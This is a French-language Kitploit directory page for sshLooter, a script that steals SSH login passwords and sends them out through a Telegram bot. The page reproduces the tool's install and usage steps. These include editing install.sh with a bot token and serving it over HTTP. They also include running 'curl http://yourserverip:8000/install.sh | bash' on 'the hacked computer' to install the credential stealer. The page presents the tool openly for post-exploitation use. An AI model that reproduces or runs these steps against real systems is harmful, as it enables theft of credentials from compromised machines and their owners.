Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
sshLooter — Script to steal passwords from ssh. | Kitploit
Outils/GitHubGitHub/mthbernardes/sshlooter
Password CrackingPersistence MechanismsPost-ExploitationSocial EngineeringRed TeamingArchived
GitHubmthbernardes/sshlooter

sshLooter

Script to steal passwords from ssh.

Voir le dépôt
489117il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

N'UTILISEZ PAS CECI

Il existe une version C bien meilleure : sshLooterC

sshLooter

Script pour voler les mots de passe lors de connexions SSH.

Installation

root@kitploit:~
git clone https://github.com/mthbernardes/sshLooter.git
cd sshLooter

Configuration

root@kitploit:~
Edit the script on install.sh, and add your telegram bot api, and your userid.
Call the @botfather on telegram to create a bot and call the @userinfobot to get your user id.

Utilisation

root@kitploit:~
On your server execute.
python -m SimpleHTTPServer

On the hacked computer execute.
curl http://yourserverip:8000/install.sh | bash

Script original de

ChokePoint

Mon article sur ce script

Stealing SSH credentials Another Approach.

Télécharger l’outil